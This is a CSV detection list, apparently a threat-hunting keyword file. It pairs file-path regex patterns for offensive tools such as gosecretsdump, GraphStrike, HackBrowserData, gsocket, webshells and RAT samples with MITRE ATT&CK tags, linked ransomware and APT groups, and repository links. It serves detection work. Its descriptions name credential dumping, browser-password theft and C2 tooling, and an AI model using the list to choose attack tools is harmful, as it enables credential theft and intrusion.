"*\gosecretsdump\*",".{0,1000}\\gosecretsdump\\.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","15686"
"*\gosecretsdump_linux*",".{0,1000}\\gosecretsdump_linux.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","15687"
"*\gosecretsdump_mac*",".{0,1000}\\gosecretsdump_mac.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","15688"
"*\gosecretsdump_win*",".{0,1000}\\gosecretsdump_win.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","Lockbit - Black Basta","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","N/A","10","4","391","50","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z","15689"
"*\GoStompy.go*",".{0,1000}\\GoStompy\.go.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","0","N/A","N/A","10","1","46","6","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z","15692"
"*\goWMIExec_linux_*",".{0,1000}\\goWMIExec_linux_.{0,1000}","offensive_tool_keyword","goWMIExec","re-implementation of invoke-wmiexec (Lateral Movement)","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/C-Sto/goWMIExec","1","0","N/A","N/A","10","3","214","42","2023-02-25T01:41:41Z","2019-10-14T22:32:11Z","15707"
"*\goWMIExec_mac_*",".{0,1000}\\goWMIExec_mac_.{0,1000}","offensive_tool_keyword","goWMIExec","re-implementation of invoke-wmiexec (Lateral Movement)","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/C-Sto/goWMIExec","1","0","N/A","N/A","10","3","214","42","2023-02-25T01:41:41Z","2019-10-14T22:32:11Z","15708"
"*\goWMIExec_win_*",".{0,1000}\\goWMIExec_win_.{0,1000}","offensive_tool_keyword","goWMIExec","re-implementation of invoke-wmiexec (Lateral Movement)","T1021.005","TA0008","N/A","N/A","Lateral Movement","https://github.com/C-Sto/goWMIExec","1","0","N/A","N/A","10","3","214","42","2023-02-25T01:41:41Z","2019-10-14T22:32:11Z","15709"
"*\goZulipC2*",".{0,1000}\\goZulipC2.{0,1000}","offensive_tool_keyword","goZulipC2","C2 leveraging Zulip Messaging Platform as Backend.","T1090 - T1090.003 - T1071 - T1071.001","TA0011 - TA0009","N/A","N/A","C2","https://github.com/n1k7l4i/goZulipC2","1","0","N/A","N/A","10","","N/A","","","","15710"
"*\GPOBrowser.py*",".{0,1000}\\GPOBrowser\.py.{0,1000}","offensive_tool_keyword","Adcheck","Assess the security of your Active Directory with few or all privileges. This tool offers functionalities similar to PingCastle","T1087 - T1012 - T1482 - T1059 - T1203 - T1212 - T1480 - T1552 - T1112 - T1207 - T1483 - T1113 - T1057 - T1136 - T1119 - T1082 - T1553 - T1140 - T1107 - T1078 - T1562","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/CobblePot59/Adcheck","1","0","N/A","N/A","10","4","315","35","2025-04-18T15:17:46Z","2024-05-10T13:54:45Z","15711"
"*\GPOddity\*",".{0,1000}\\GPOddity\\.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/synacktiv/GPOddity","1","0","N/A","N/A","9","3","297","26","2024-11-08T15:14:06Z","2023-09-01T08:13:25Z","15712"
"*\gpp_autologin.py*",".{0,1000}\\gpp_autologin\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","15713"
"*\gpp_password.py*",".{0,1000}\\gpp_password\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","15714"
"*\GPUnprotect.zip*",".{0,1000}\\GPUnprotect\.zip.{0,1000}","offensive_tool_keyword","GlobalUnProtect","Decrypt GlobalProtect configuration and cookie files.","T1552 - T1003 - T1555","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/rotarydrone/GlobalUnProtect","1","0","N/A","N/A","9","2","147","19","2024-09-10T20:19:24Z","2024-09-04T15:31:52Z","15715"
"*\grabchrome.exe*",".{0,1000}\\grabchrome\.exe.{0,1000}","offensive_tool_keyword","GrabChrome","HelloKitty Grabber used by Dispossessor ransomware group","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Dispossessor","Credential Access","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","15716"
"*\GraphLdr.x64.bin*",".{0,1000}\\GraphLdr\.x64\.bin.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005  - TA0011","N/A","Black Basta","C2","https://github.com/RedSiege/GraphStrike","1","0","N/A","N/A","10","10","585","95","2024-06-25T11:18:19Z","2024-01-02T00:18:44Z","15717"
"*\Graphpython.py*",".{0,1000}\\Graphpython\.py.{0,1000}","offensive_tool_keyword","Graphpython","Modular cross-platform Microsoft Graph API (Entra - o365 and Intune) enumeration and exploitation toolkit","T1078.004 - T1114.002","TA0001 - TA0003  - TA0006 - TA0008 - TA0007 - TA0010","N/A","N/A","Discovery","https://github.com/mlcsec/Graphpython","1","0","N/A","N/A","7","2","145","13","2024-12-07T21:54:00Z","2024-07-10T00:04:48Z","15718"
"*\GraphRunner.ps1*",".{0,1000}\\GraphRunner\.ps1.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","15719"
"*\GraphRunner-main*",".{0,1000}\\GraphRunner\-main.{0,1000}","offensive_tool_keyword","GraphRunner","A Post-exploitation Toolset for Interacting with the Microsoft Graph API","T1059.007 - T1087.001 - T1078.001 - T1585.001 - T1071.001","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","Exploitation tool","https://github.com/dafthack/GraphRunner","1","0","N/A","N/A","10","10","1082","127","2024-11-07T04:40:34Z","2023-08-15T17:19:11Z","15720"
"*\GraphSpy.py*",".{0,1000}\\GraphSpy\.py.{0,1000}","offensive_tool_keyword","GraphSpy","Initial Access and Post-Exploitation Tool for AAD and O365 with a browser-based GUI","T1078.004 - T1110.003 - T1071.001 - T1566.002 - T1656","TA0001 - TA0006 - TA0003 - TA0005 - TA0008","N/A","N/A","Collection","https://github.com/RedByte1337/GraphSpy","1","0","N/A","N/A","10","7","680","72","2025-04-15T21:07:15Z","2024-02-07T19:47:15Z","15721"
"*\GraphStrike.cna*",".{0,1000}\\GraphStrike\.cna.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005  - TA0011","N/A","Black Basta","C2","https://github.com/RedSiege/GraphStrike","1","0","N/A","N/A","10","10","585","95","2024-06-25T11:18:19Z","2024-01-02T00:18:44Z","15722"
"*\GraphStrike.py*",".{0,1000}\\GraphStrike\.py.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005  - TA0011","N/A","Black Basta","C2","https://github.com/RedSiege/GraphStrike","1","0","N/A","N/A","10","10","585","95","2024-06-25T11:18:19Z","2024-01-02T00:18:44Z","15723"
"*\GraphStrike-main\*",".{0,1000}\\GraphStrike\-main\\.{0,1000}","offensive_tool_keyword","GraphStrike","Cobalt Strike HTTPS beaconing over Microsoft Graph API","T1102 - T1071.001 ","TA0002 - TA0005  - TA0011","N/A","Black Basta","C2","https://github.com/RedSiege/GraphStrike","1","0","N/A","N/A","10","10","585","95","2024-06-25T11:18:19Z","2024-01-02T00:18:44Z","15724"
"*\grbachrome.exe*",".{0,1000}\\grbachrome\.exe.{0,1000}","offensive_tool_keyword","GrabChrome","HelloKitty Grabber used by Dispossessor ransomware group","T1003 - T1555 - T1081 - T1552","TA0006","N/A","Dispossessor","Credential Access","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","15725"
"*\GreameRAT.exe*",".{0,1000}\\GreameRAT\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","15726"
"*\group_members.py*",".{0,1000}\\group_members\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","15727"
"*\Group3r.cs*",".{0,1000}\\Group3r\.cs.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","N/A","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","15728"
"*\Group3r.exe*",".{0,1000}\\Group3r\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","15729"
"*\Group3r.exe*",".{0,1000}\\Group3r\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","15730"
"*\Group3r.exe*",".{0,1000}\\Group3r\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","15731"
"*\group3r.log*",".{0,1000}\\group3r\.log.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","N/A","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","15732"
"*\Group3r.sln*",".{0,1000}\\Group3r\.sln.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","N/A","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","15733"
"*\Grouper2.exe*",".{0,1000}\\Grouper2\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","15734"
"*\Grouper2.exe*",".{0,1000}\\Grouper2\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","15735"
"*\groupmembership.py*",".{0,1000}\\groupmembership\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","0","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","15736"
"*\gsecdump-*.exe*",".{0,1000}\\gsecdump\-.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","gsecdump","credential dumper used to obtain password hashes and LSA secrets from Windows operating systems","T1003.001 - T1003.002 - T1555.003 - T1555.001","TA0006 - TA0008","N/A","APT1 - PittyTiger - Tonto Team - BRONZE BUTLER - Threat Group-3390 - APT22 - APT24 - APT27 - Night Dragon - Tick","Credential Access","https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","15737"
"*\gsecdump.exe*",".{0,1000}\\gsecdump\.exe.{0,1000}","offensive_tool_keyword","gsecdump","credential dumper used to obtain password hashes and LSA secrets from Windows operating systems","T1003.001 - T1003.002 - T1555.003 - T1555.001","TA0006 - TA0008","N/A","APT1 - PittyTiger - Tonto Team - BRONZE BUTLER - Threat Group-3390 - APT22 - APT24 - APT27 - Night Dragon - Tick","Credential Access","https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","15738"
"*\gs-netcat ",".{0,1000}\\gs\-netcat\s","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","15739"
"*\gsocket-*.tar.gz*",".{0,1000}\\gsocket\-.{0,1000}\.tar\.gz.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","15740"
"*\gsocket_*_all.deb*",".{0,1000}\\gsocket_.{0,1000}_all\.deb.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","15741"
"*\gsocket_dso.so.*",".{0,1000}\\gsocket_dso\.so\..{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Securely.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","10","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","15742"
"*\gs-sftp*",".{0,1000}\\gs\-sftp.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","0","N/A","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","15745"
"*\gtfonow.py*",".{0,1000}\\gtfonow\.py.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","N/A","6","6","566","73","2024-11-10T08:38:30Z","2021-01-18T21:16:40Z","15746"
"*\Gupt-Backdoor.ps1*",".{0,1000}\\Gupt\-Backdoor\.ps1.{0,1000}","offensive_tool_keyword","PSAttack","PSAttack contains over 100 commands for Privilege Escalation - Recon and Data Exfilitration","T1059 - T1212 - T1012 - T1087 - T1005 - T1041 - T1020","TA0002 - TA0004 - TA0005 - TA0007 - TA0010 - TA0008","N/A","N/A","Exploitation tool","https://github.com/GDSSecurity/PSAttack","1","0","N/A","N/A","10","1","45","15","2017-04-04T20:37:33Z","2016-02-22T23:45:22Z","15748"
"*\gwisinlocker.txt*",".{0,1000}\\gwisinlocker\.txt.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","15749"
"*\GzipB64.exe*",".{0,1000}\\GzipB64\.exe.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","15750"
"*\H Remote Admin Tools.exe*",".{0,1000}\\H\sRemote\sAdmin\sTools\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","15751"
"*\h0lygh0st.html*",".{0,1000}\\h0lygh0st\.html.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","15752"
"*\h4ntu shell [powered by tsoi].php*",".{0,1000}\\h4ntu\sshell\s\[powered\sby\stsoi\]\.php.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","N/A","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","15753"
"*\hack.ps1*",".{0,1000}\\hack\.ps1.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","0","N/A","N/A","N/A","10","3212","499","2025-01-19T12:29:35Z","2022-07-10T15:36:24Z","15754"
"*\HackBrowserData*",".{0,1000}\\HackBrowserData.{0,1000}","offensive_tool_keyword","cobaltstrike","reflective module for HackBrowserData","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/idiotc4t/Reflective-HackBrowserData","1","0","N/A","N/A","10","10","175","25","2021-03-13T08:42:18Z","2021-03-13T08:35:01Z","15755"
"*\hack-browser-data.exe*",".{0,1000}\\hack\-browser\-data\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","15756"
"*\hack-browser-data-linux-386.zip*",".{0,1000}\\hack\-browser\-data\-linux\-386\.zip.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","N/A","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","15757"
"*\hack-browser-data-linux-amd64.zip*",".{0,1000}\\hack\-browser\-data\-linux\-amd64\.zip.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","N/A","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","15758"
"*\hack-browser-data-linux-arm.zip*",".{0,1000}\\hack\-browser\-data\-linux\-arm\.zip.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","N/A","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","15759"
"*\hack-browser-data-linux-arm64.zip*",".{0,1000}\\hack\-browser\-data\-linux\-arm64\.zip.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","N/A","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","15760"
"*\hack-browser-data-osx-64bit.zip*",".{0,1000}\\hack\-browser\-data\-osx\-64bit\.zip.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","N/A","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","15761"
"*\hack-browser-data-windows-32bit.zip*",".{0,1000}\\hack\-browser\-data\-windows\-32bit\.zip.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","N/A","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","15762"
"*\hack-browser-data-windows-64bit.zip*",".{0,1000}\\hack\-browser\-data\-windows\-64bit\.zip.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","N/A","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","15763"
"*\Hades.exe*",".{0,1000}\\Hades\.exe.{0,1000}","offensive_tool_keyword","Executable_Files","Database for custom made as well as publicly available stage-2 or beacons or stageless payloads used by loaders/stage-1/stagers or for further usage of C2 as well","T1071 - T1071.001 - T1105 - T1041 - T1102","TA0011 - TA0005 - TA0010","N/A","Black Basta","Exploitation tool","https://github.com/reveng007/Executable_Files","1","0","N/A","N/A","10","1","10","2","2025-02-11T08:08:04Z","2021-12-10T15:04:35Z","15764"
